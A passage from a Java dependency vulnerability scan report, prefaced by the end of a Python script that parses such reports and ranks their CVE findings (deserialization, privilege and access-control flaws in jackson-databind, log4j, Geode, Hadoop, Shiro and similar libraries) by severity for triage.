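_CVSS = re.compile(r"^CVSS Score:\s*([\d.]+)\s*\((.*?)\)")
_CWE = re.compile(r"^CWE:\s*(CWE-\d+)")
_RCE_WORDS = re.compile(r"execute arbitrary code|code execution|arbitrary commands", re.I)

@dataclass
class Finding:
    cve: str
    severity: str = ""
    score: float = 0.0
    vector: str = ""
    cwe: str = ""
    description: str = ""

    def is_rce_class(self):
        """CWE-502 counts as RCE-class even when the NVD text is vague about impact."""
        return self.cwe == "CWE-502" or bool(_RCE_WORDS.search(self.description))

@dataclass
class Dependency:
    name: str
    identifiers: list = field(default_factory=list)  # (kind, value, confidence) tuples
    findings: list = field(default_factory=list)

def parse_report(text):
    """Turn the text report into Dependency objects carrying identifiers and CVEs."""
    deps, dep, finding = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := _DEP_HEADING.match(line):
            dep, finding = Dependency(m.group(1)), None
            deps.append(dep)
        elif dep is None:
            continue
        elif m := _CVE_HEADING.match(line):
            finding = Finding(m.group(1))
            dep.findings.append(finding)
        elif m := _IDENTIFIER.match(line):
            dep.identifiers.append(m.groups())
        elif finding is None:
            continue
        elif m := _SEVERITY.match(line):
            finding.severity = m.group(1)
        elif m := _CVSS.match(line):
            finding.score, finding.vector = float(m.group(1)), m.group(2)
        elif m := _CWE.match(line):
            finding.cwe = m.group(1)
        elif line and not line.startswith("Vulnerable Software") and not finding.description:
            finding.description = line  # first prose line after the header fields
    return deps

def triage(deps):
    """Dependencies with findings, worst first: (name, highest CVSS, RCE-class CVE ids)."""
    rows = [(d.name, max(f.score for f in d.findings),
             [f.cve for f in d.findings if f.is_rce_class()]) for d in deps if d.findings]
    return sorted(rows, key=lambda r: r[1], reverse=True)

def low_confidence_cpes(deps):
    """CPE matches made at Low confidence: the first place to look when a finding smells
    like a false positive, because a wrong CPE pulls in another product's CVEs."""
    return [(d.name, value) for d in deps
            for kind, value, conf in d.identifiers if kind == "cpe" and conf == "Low"]

# Constructed excerpt of this page's jackson-databind and slf4j-api entries.
SAMPLE_REPORT = """\
jackson-databind-2.8.6.jar
  • maven: com.fasterxml.jackson.core:jackson-databind:2.8.6  Confidence:Highest
  • cpe: cpe:/a:fasterxml:jackson:2.8.6  Confidence:Low
  • cpe: cpe:/a:fasterxml:jackson-databind:2.8.6  Confidence:Highest

CVE-2017-7525
Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data
A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper.
Vulnerable Software & Versions:

CVE-2018-5968
Severity:Medium
CVSS Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
CWE: CWE-184 Incomplete Blacklist
FasterXML jackson-databind through 2.8.11 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 and CVE-2017-17485 deserialization flaws. This is exploitable via two different gadgets that bypass a blacklist.
Vulnerable Software & Versions:

slf4j-api-1.5.6.jar
  • maven: org.slf4j:slf4j-api:1.5.6  Confidence:Highest
  • cpe: cpe:/a:slf4j:slf4j:1.5.6  Confidence:Low
"""
if __name__ == "__main__":
    deps = parse_report(SAMPLE_REPORT)
    print(*triage(deps), sep="\n")
    print("Low-confidence CPE matches:", low_confidence_cpes(deps))
```

The ranking is by the tool's CVSS 2 base score, which is why CVE-2018-5968 (5.1, rated Medium because of its AC:H component) sits below findings that are in practice the same deserialization bug; the RCE-class flag exists so that a Medium score does not hide that. Treat the Low-confidence CPE list as a review queue rather than an automatic suppression list: a Low match is sometimes right.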

commons-lang-2.6.jar

Description:

 Commons Lang, a package of Java utility classes for the classes that are in java.lang's hierarchy, or are considered to be so standard as to justify existence in java.lang.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-lang/commons-lang/2.6/commons-lang-2.6.jar
MD5: 4d5c1693079575b362edf41500630bbd
SHA1: 0ce1edb914c94ebc388f086c6827e8bdeec71ac2
SHA256:50f11b09f877c294d56f24463f47d28f929cf5044f648661c0f0cfbae9a2f49c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-lang:commons-lang:2.6  Confidence:Highest

fastutil-7.1.0.jar

Description:

 fastutil extends the Java Collections Framework by providing type-specific maps, sets, lists and priority queues with a small memory footprint and fast access and insertion; provides also big (64-bit) arrays, sets and lists, and fast, practical I/O classes for binary and text files.

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/it/unimi/dsi/fastutil/7.1.0/fastutil-7.1.0.jar
MD5: 35fc1f3aaab7a782873be02319a53828
SHA1: 9835253257524c1be7ab50c057aa2d418fb72082
SHA256:c266701bd7a4a2c36285862c1e682ccb7b5cb5b380d0de9bb1b34becf9e1c065
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: it.unimi.dsi:fastutil:7.1.0  Confidence:Highest

javax.transaction-api-1.2.jar

Description:

 Project GlassFish Java Transaction API

License:

CDDL + GPLv2 with classpath exception: https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html
File Path: /Users/Kevin/.m2/repository/javax/transaction/javax.transaction-api/1.2/javax.transaction-api-1.2.jar
MD5: 2dfee184286530e726ad155816e15b4c
SHA1: d81aff979d603edd90dcd8db2abc1f4ce6479e3e
SHA256:9528449583c34d9d63aa1d8d15069790f925ae1f27b33784773b8099eff4c9ff
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.transaction:javax.transaction-api:1.2  Confidence:Highest

javax.resource-api-1.7.jar

Description:

 Java EE Connector Architecture API

License:

CDDL + GPLv2 with classpath exception: https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html
File Path: /Users/Kevin/.m2/repository/javax/resource/javax.resource-api/1.7/javax.resource-api-1.7.jar
MD5: 51129256d155d7352fc1f066d2cbc6dc
SHA1: ae40e0864eb1e92c48bf82a2a3399cbbf523fb79
SHA256:216e0ac7018752122f3f44291aa816fc3a50504a79212a4397a194ad51308798
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.resource:javax.resource-api:1.7  Confidence:Highest

jna-4.0.0.jar

Description:

 Java Native Access

License:

LGPL, version 2.1: http://www.gnu.org/licenses/licenses.html
ASL, version 2: http://www.apache.org/licenses/
File Path: /Users/Kevin/.m2/repository/net/java/dev/jna/jna/4.0.0/jna-4.0.0.jar
MD5: a1e20e48a367063023db9137ceb7c63c
SHA1: 9b3a11c613ec3fd3440af4103b12c3de82d38b6e
SHA256:dac270b6441ce24d93a96ddb6e8f93d8df099192738799a6f6fcfc2b2416ca19
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.java.dev.jna:jna:4.0.0  Confidence:Highest

jopt-simple-5.0.3.jar

Description:

 A Java library for parsing command line options

License:

The MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /Users/Kevin/.m2/repository/net/sf/jopt-simple/jopt-simple/5.0.3/jopt-simple-5.0.3.jar
MD5: 0a5ec84e23df9d7cfb4063bc55f2744c
SHA1: cdd846cfc4e0f7eefafc02c0f5dce32b9303aa2a
SHA256:6f45c00908265947c39221035250024f2caec9a15c1c8cf553ebeecee289f342
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.sf.jopt-simple:jopt-simple:5.0.3  Confidence:Highest

log4j-core-2.7.jar

Description:

 The Apache Log4j Implementation

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/logging/log4j/log4j-core/2.7/log4j-core-2.7.jar
MD5: 2b63e0e5063fdaccf669a1e26384f3fd
SHA1: a3f2b4e64c61a7fc1ed8f1e5ba371933404ed98a
SHA256:5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.logging.log4j:log4j-core:2.7  Confidence:Highest
  • cpe: cpe:/a:apache:log4j:2.7  Confidence:Highest  

CVE-2017-5645  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.

Vulnerable Software & Versions:

shiro-core-1.3.2.jar

Description:

 Apache Shiro is a powerful and flexible open-source security framework that cleanly handles authentication, authorization, enterprise session management, single sign-on and cryptography services.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/shiro/shiro-core/1.3.2/shiro-core-1.3.2.jar
MD5: 1c71224cdfa52fcba0a20b992195cf36
SHA1: b5dede9d890f335998a8ebf479809fe365b927fc
SHA256:2d5f2658e691012b9e62c6061fd817a98518d03e6370ab2f370d274835ca3a8c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.shiro:shiro-core:1.3.2  Confidence:Highest
  • cpe: cpe:/a:apache:shiro:1.3.2  Confidence:Low  

commons-beanutils-1.9.3.jar

Description:

 Apache Commons BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.

License:

https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-beanutils/commons-beanutils/1.9.3/commons-beanutils-1.9.3.jar
MD5: 4a105c9d029a7edc6f2b16567d37eab6
SHA1: c845703de334ddc6b4b3cd26835458cb1cba1f3d
SHA256:c058e39c7c64203d3a448f3adb588cb03d6378ed808485618f26e137f29dae73
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:commons_beanutils:1.9.3  Confidence:Low  
  • maven: commons-beanutils:commons-beanutils:1.9.3  Confidence:Highest

fast-classpath-scanner-2.0.11.jar

Description:

 Uber-fast, ultra-lightweight Java classpath scanner. Scans the classpath by parsing the classfile binary format directly rather than by using reflection. See https://github.com/lukehutch/fast-classpath-scanner

License:

The MIT License (MIT): http://opensource.org/licenses/MIT
File Path: /Users/Kevin/.m2/repository/io/github/lukehutch/fast-classpath-scanner/2.0.11/fast-classpath-scanner-2.0.11.jar
MD5: d2d38795baa2d167da1b82516db630d5
SHA1: ae34a7a5e6de8ad1f86e12f6f7ae1869fcfe9987
SHA256:ee7e4bf67b29338318c48caaf204f59de8fcb8d2f782fa315fffd0c60c7d5962
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.github.lukehutch:fast-classpath-scanner:2.0.11  Confidence:Highest

geode-core-1.2.1.jar

Description:

 Apache Geode provides a database-like consistency model, reliable transaction processing and a shared-nothing architecture to maintain very low latency performance with high concurrency processing

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/geode/geode-core/1.2.1/geode-core-1.2.1.jar
MD5: 03350317340b54a7c6e08e58ca201229
SHA1: fe853317e33dd2a1c291f29cee3c4be549f75a69
SHA256:63d6199a262afd27f479619731213d15f907b2c3b047d79685bc58afa4daae29
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.geode:geode-core:1.2.1  Confidence:Highest
  • cpe: cpe:/a:apache:geode:1.2.1  Confidence:Highest  

CVE-2017-12622  

Severity:Medium
CVSS Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N)
CWE: CWE-200 Information Exposure

When an Apache Geode cluster before v1.3.0 is operating in secure mode and an authenticated user connects to a Geode cluster using the gfsh tool with HTTP, the user is able to obtain status information and control cluster members even without CLUSTER:MANAGE privileges.

Vulnerable Software & Versions:

CVE-2017-15692  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

In Apache Geode before v1.4.0, the TcpServer within the Geode locator opens a network port that deserializes data. If an unprivileged user gains access to the Geode locator, they may be able to cause remote code execution if certain classes are present on the classpath.

Vulnerable Software & Versions:

CVE-2017-15693  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

In Apache Geode before v1.4.0, the Geode server stores application objects in serialized form. Certain cluster operations and API invocations cause these objects to be deserialized. A user with DATA:WRITE access to the cluster may be able to cause remote code execution if certain classes are present on the classpath.

Vulnerable Software & Versions:

CVE-2017-15695  

Severity:Medium
CVSS Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

When an Apache Geode server versions 1.0.0 to 1.4.0 is configured with a security manager, a user with DATA:WRITE privileges is allowed to deploy code by invoking an internal Geode function. This allows remote code execution. Code deployment should be restricted to users with DATA:MANAGE privilege.

Vulnerable Software & Versions:

CVE-2017-15696  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When an Apache Geode cluster before v1.4.0 is operating in secure mode, the Geode configuration service does not properly authorize configuration requests. This allows an unprivileged user who gains access to the Geode locator to extract configuration data and previously deployed application code.

Vulnerable Software & Versions:

CVE-2017-9795  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-200 Information Exposure

When an Apache Geode cluster before v1.3.0 is operating in secure mode, a user with read access to specific regions within a Geode cluster may execute OQL queries that allow read and write access to objects within unauthorized regions. In addition a user could invoke methods that allow remote code execution.

Vulnerable Software & Versions:

CVE-2017-9796  

Severity:Low
CVSS Score: 3.5 (AV:N/AC:M/Au:S/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When an Apache Geode cluster before v1.3.0 is operating in secure mode, a user with read access to specific regions within a Geode cluster may execute OQL queries containing a region name as a bind parameter that allow read access to objects within unauthorized regions.

Vulnerable Software & Versions:

javax.persistence-2.1.0.jar

Description:

 EclipseLink build based upon Git transaction 3faac2b

License:

Eclipse Public License v1.0: http://www.eclipse.org/legal/epl-v10.html
Eclipse Distribution License v. 1.0: http://www.eclipse.org/org/documents/edl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/persistence/javax.persistence/2.1.0/javax.persistence-2.1.0.jar
MD5: da288f571e85f4a1a7f50cb8c9ef9bbd
SHA1: 5bab675816dbe0f64bb86004b108bf2a00292358
SHA256:227c4888011550cad0aed4c07e187b9f8e873c01558a08f014d288987415a9a9
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.persistence:javax.persistence:2.1.0  Confidence:Highest

commonj.sdo-2.1.1.jar

Description:

 EclipseLink build based upon Git transaction 9c3c264

License:

Eclipse Public License v1.0: http://www.eclipse.org/legal/epl-v10.html
Eclipse Distribution License v. 1.0: http://www.eclipse.org/org/documents/edl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/persistence/commonj.sdo/2.1.1/commonj.sdo-2.1.1.jar
MD5: 6e95eece101364642efe2d4543c8993c
SHA1: 90d4c89ce0a69f58619f1a247bbf420122139ff5
SHA256:b7ea9746f2c77e7261485b39b09938ca54e9cb58eb0d7c250a97d300b9a0dbbe
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.persistence:commonj.sdo:2.1.1  Confidence:Highest

eclipselink-2.5.2.jar

Description:

 EclipseLink build based upon Git transaction 9ad6abd

License:

Eclipse Public License v1.0: http://www.eclipse.org/legal/epl-v10.html
Eclipse Distribution License v. 1.0: http://www.eclipse.org/org/documents/edl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/persistence/eclipselink/2.5.2/eclipselink-2.5.2.jar
MD5: 18562489919fbec70cc77897a7a7bbb7
SHA1: cd2211635f3011e300ca8fedc1ce0e1cf61c175b
SHA256:67d175c1858005308ae9a02ff85c0bc7efc9a2a3c058a6838d51769f417f5247
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.persistence:eclipselink:2.5.2  Confidence:Highest

gateway-i18n-logging-log4j-0.10.0.jar

Description:

 An extension of the logging framework that integrates Log4J.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/knox/gateway-i18n-logging-log4j/0.10.0/gateway-i18n-logging-log4j-0.10.0.jar
MD5: 90c975d94d6e579bd4c29da76b7ca6fe
SHA1: 8887ab7157d97d51d53fe3963e23360579d341f8
SHA256:62412868890370bb9c2aeafbeca2c648c1a5f7c19ac933cbfaefcaa8217c51a2
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:log4j:0.10.0  Confidence:Low  
  • maven: org.apache.knox:gateway-i18n-logging-log4j:0.10.0  Confidence:Highest

apacheds-i18n-2.0.0-M5.jar

Description:

 Internationalization of errors and other messages

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/directory/server/apacheds-i18n/2.0.0-M5/apacheds-i18n-2.0.0-M5.jar
MD5: 8b62adb819490e47cada8fe9fecce26f
SHA1: a94114a538f8a6020f1728b05e06941ea74f079c
SHA256:7130fd997be445dd29d4fc4bdf39560cb34c95cee657fcf26ed9292388295139
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.directory.server:apacheds-i18n:2.0.0-M5  Confidence:Highest

apacheds-jdbm-2.0.0-M5.jar

Description:

 Specific JDBM Implementation

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/directory/server/apacheds-jdbm/2.0.0-M5/apacheds-jdbm-2.0.0-M5.jar
MD5: c77336eeb5ae8b3e081345ce26ea47ef
SHA1: fcb14d6453ccf74e124fe352df3f671af680af7c
SHA256:a5c0003c9be871bfc348c8f31f1c4d00ad270fbdfb2a18cda9feba647d009f69
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.directory.server:apacheds-jdbm:2.0.0-M5  Confidence:Highest

json-smart-1.3.1.jar

Description:

 JSON (JavaScript Object Notation) is a lightweight data-interchange format. It is easy for humans to read and write. It is easy for machines to parse and generate. It is based on a subset of the JavaScript Programming Language, Standard ECMA-262 3rd Edition - December 1999. JSON is a text format that is completely language independent but uses conventions that are familiar to programmers of the C-family of languages, including C, C++, C#, Java, JavaScript, Perl, Python, and many others. These properties make JSON an ideal data-interchange language.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/net/minidev/json-smart/1.3.1/json-smart-1.3.1.jar
MD5: b4f09b247c03cc2d091502d5b1db1f7f
SHA1: 69b3835e96d282ec85fc2e1517b8164c45ed639e
SHA256:ac3689112788e042088755e63ecd1f689adfeb04d7fb1cfd244513f94f82522c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.minidev:json-smart:1.3.1  Confidence:Highest

nimbus-jose-jwt-4.11.jar

Description:

 Java library for Javascript Object Signing and Encryption (JOSE) and JSON Web Tokens (JWT)

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/nimbusds/nimbus-jose-jwt/4.11/nimbus-jose-jwt-4.11.jar
MD5: 4937436b091719cc6ad75ee61a4f1e2b
SHA1: 9409f5b0a69dc17fa426ac3d65c9d46990df2770
SHA256:cab3445297d9a39ad63ed9d63a2471d58e447c2e3eaecabc87b01b6f751de6f3
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2017-12972  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-345 Insufficient Verification of Data Authenticity

In Nimbus JOSE+JWT before 4.39, there is no integer-overflow check when converting length values from bytes to bits, which allows attackers to conduct HMAC bypass attacks by shifting Additional Authenticated Data (AAD) and ciphertext so that different plaintext is obtained for the same HMAC.

Vulnerable Software & Versions:

CVE-2017-12973  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

Nimbus JOSE+JWT before 4.39 proceeds improperly after detection of an invalid HMAC in authenticated AES-CBC decryption, which allows attackers to conduct a padding oracle attack.

Vulnerable Software & Versions:

CVE-2017-12974  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

Nimbus JOSE+JWT before 4.36 proceeds with ECKey construction without ensuring that the public x and y coordinates are on the specified curve, which allows attackers to conduct an Invalid Curve Attack in environments where the JCE provider lacks the applicable curve validation.

Vulnerable Software & Versions:

json-path-0.9.1.jar

Description:

 Java JsonPath implementation

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/com/jayway/jsonpath/json-path/0.9.1/json-path-0.9.1.jar
MD5: 4a988b13309eb8dc724e20dd81b7578d
SHA1: 1a198cf545b2656656fecda5add3ba436e715185
SHA256:5a3f7746983bc88e8b04c30bd1e934aa9ef197c9f64d2ae7e05cfb108184c5f3
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.jayway.jsonpath:json-path:0.9.1  Confidence:Highest

gateway-spi-0.10.0.jar

Description:

 The Service Provider Interface for extending the capabilities of the gateway.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/knox/gateway-spi/0.10.0/gateway-spi-0.10.0.jar
MD5: 4814f10fddb58c3ed8182be2088b928b
SHA1: b91bca88e79ea485ddc78c6ed67c11f416a1b568
SHA256:e6cf7ad413a67a7665b9925b9e01b86611dbe1d6d55ebfc67af18c309f640a59
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:knox:0.10.0  Confidence:Highest  
  • maven: org.apache.knox:gateway-spi:0.10.0  Confidence:Highest

CVE-2017-5646  

Severity:Medium
CVSS Score: 4.9 (AV:N/AC:M/Au:S/C:P/I:P/A:N)
CWE: CWE-346 Origin Validation Error

For versions of Apache Knox from 0.2.0 to 0.11.0 - an authenticated user may use a specially crafted URL to impersonate another user while accessing WebHDFS through Apache Knox. This may result in escalated privileges and unauthorized data access. While this activity is audit logged and can be easily associated with the authenticated user, this is still a serious security issue. All users are recommended to upgrade to the Apache Knox 0.12.0 release.

Vulnerable Software & Versions:

hadoop-auth-2.2.0.jar

Description:

 Apache Hadoop Auth - Java HTTP SPNEGO

File Path: /Users/Kevin/.m2/repository/org/apache/hadoop/hadoop-auth/2.2.0/hadoop-auth-2.2.0.jar
MD5: 8bb0f03bea387738b61642a2502b3289
SHA1: 74e5f8b2134be51312c004d29e33a7bf4377ce20
SHA256:f2c50d66e049c378088975774656d8e111265d12fbba1cde97de71dd01b96d2b
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:hadoop:2.2.0  Confidence:Highest  
  • maven: org.apache.hadoop:hadoop-auth:2.2.0  Confidence:Highest

CVE-2014-0229  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Apache Hadoop 0.23.x before 0.23.11 and 2.x before 2.4.1, as used in Cloudera CDH 5.0.x before 5.0.2, do not check authorization for the (1) refreshNamenodes, (2) deleteBlockPool, and (3) shutdownDatanode HDFS admin commands, which allows remote authenticated users to cause a denial of service (DataNodes shutdown) or perform unnecessary operations by issuing a command.

Vulnerable Software & Versions:

CVE-2014-3627  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-59 Improper Link Resolution Before File Access ('Link Following')

The YARN NodeManager daemon in Apache Hadoop 0.23.0 through 0.23.11 and 2.x before 2.5.2, when using Kerberos authentication, allows remote cluster users to change the permissions of certain files to world-readable via a symlink attack in a public tar archive, which is not properly handled during localization, related to distributed cache.

Vulnerable Software & Versions:

CVE-2016-5001  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

This is an information disclosure vulnerability in Apache Hadoop before 2.6.4 and 2.7.x before 2.7.2 in the short-circuit reads feature of HDFS. A local user on an HDFS DataNode may be able to craft a block token that grants unauthorized read access to random files by guessing certain fields in the token.

Vulnerable Software & Versions:

CVE-2016-6811  

Severity:High
CVSS Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

In Apache Hadoop 2.x before 2.7.4, a user who can escalate to yarn user can possibly run arbitrary commands as root user.

Vulnerable Software & Versions:

CVE-2017-15713  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Vulnerability in Apache Hadoop 0.23.x, 2.x before 2.7.5, 2.8.x before 2.8.3, and 3.0.0-alpha through 3.0.0-beta1 allows a cluster user to expose private files owned by the user running the MapReduce job history server process. The malicious user can construct a configuration file containing XML directives that reference sensitive files on the MapReduce job history server host.

Vulnerable Software & Versions:

CVE-2017-3161  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The HDFS web UI in Apache Hadoop before 2.7.0 is vulnerable to a cross-site scripting (XSS) attack through an unescaped query parameter.

Vulnerable Software & Versions:

CVE-2017-3162  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

HDFS clients interact with a servlet on the DataNode to browse the HDFS namespace. The NameNode is provided as a query parameter that is not validated in Apache Hadoop before 2.7.0.

Vulnerable Software & Versions:

javax.servlet-api-3.1.0.jar

Description:

 Java(TM) Servlet 3.1 API Design Specification

License:

CDDL + GPLv2 with classpath exception: https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html
File Path: /Users/Kevin/.m2/repository/javax/servlet/javax.servlet-api/3.1.0/javax.servlet-api-3.1.0.jar
MD5: 79de69e9f5ed8c7fcb8342585732bbf7
SHA1: 3cd63d075497751784b2fa84be59432f4905bf7c
SHA256:af456b2dd41c4e82cf54f3e743bc678973d9fe35bd4d3071fa05c7e5333b8482
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.servlet:javax.servlet-api:3.1.0  Confidence:Highest

httpclient-4.5.1.jar

Description:

 Apache HttpComponents Client

File Path: /Users/Kevin/.m2/repository/org/apache/httpcomponents/httpclient/4.5.1/httpclient-4.5.1.jar
MD5: 53cad957821a4bacaf9e108af24e6f90
SHA1: 7e3cecc566df91338c6c67883b89ddd05a17db43
SHA256:0ba1a340188f33408632cedbe25d6fe17c1458bde17680a06cd6f6a69476ff74
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:httpclient:4.5.1  Confidence:Low  
  • maven: org.apache.httpcomponents:httpclient:4.5.1  Confidence:Highest

shiro-web-1.2.3.jar

Description:

 Apache Shiro is a powerful and flexible open-source security framework that cleanly handles authentication, authorization, enterprise session management, single sign-on and cryptography services.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/shiro/shiro-web/1.2.3/shiro-web-1.2.3.jar
MD5: 38105101e9efde681dc1de127193f99f
SHA1: 4dbcac122a883c29d32fe94f6b1525e5a81884ec
SHA256:aec0f2185180107b25343a986baf9a4122d5d272fa7ab9721a35552f0ad12369
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.shiro:shiro-web:1.2.3  Confidence:Highest
  • cpe: cpe:/a:apache:shiro:1.2.3  Confidence:Low  

CVE-2016-4437  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.

Vulnerable Software & Versions:

commons-codec-1.7.jar

Description:

 The codec package contains simple encoder and decoders for various formats such as Base64 and Hexadecimal. In addition to these widely used encoders and decoders, the codec package also maintains a collection of phonetic encoding utilities.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-codec/commons-codec/1.7/commons-codec-1.7.jar
MD5: e47ef8e1a0c11e0e7e41704816cda890
SHA1: 9cd61d269c88f9fb0eb36cea1efcd596ab74772f
SHA256:db82a948bc070414fcfd3880ebd1205c94df5f5c61558ccbc653ec2f820bf7a4
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-codec:commons-codec:1.7  Confidence:Highest

oro-2.0.8.jar

File Path: /Users/Kevin/.m2/repository/oro/oro/2.0.8/oro-2.0.8.jar
MD5: 42e940d5d2d822f4dc04c65053e630ab
SHA1: 5592374f834645c4ae250f4c9fbb314c9369d698
SHA256:e00ccdad5df7eb43fdee44232ef64602bf63807c2d133a7be83ba09fd49af26e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: oro:oro:2.0.8  Confidence:Highest

commons-net-1.4.1.jar

License:

The Apache Software License, Version 2.0: /LICENSE.txt
File Path: /Users/Kevin/.m2/repository/commons-net/commons-net/1.4.1/commons-net-1.4.1.jar
MD5: 365c9a26e81b212de0553fbed10452cc
SHA1: abb932adb2c10790c1eaa4365d3ac2a1ac7cb700
SHA256:05a3611dedf90d0ab3e8ed83dec4ee49200148c09425437eb9348562fde7d83c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-net:commons-net:1.4.1  Confidence:Highest

cglib-2.2.2.jar

Description:

 Code generation library

License:

ASF 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/cglib/cglib/2.2.2/cglib-2.2.2.jar
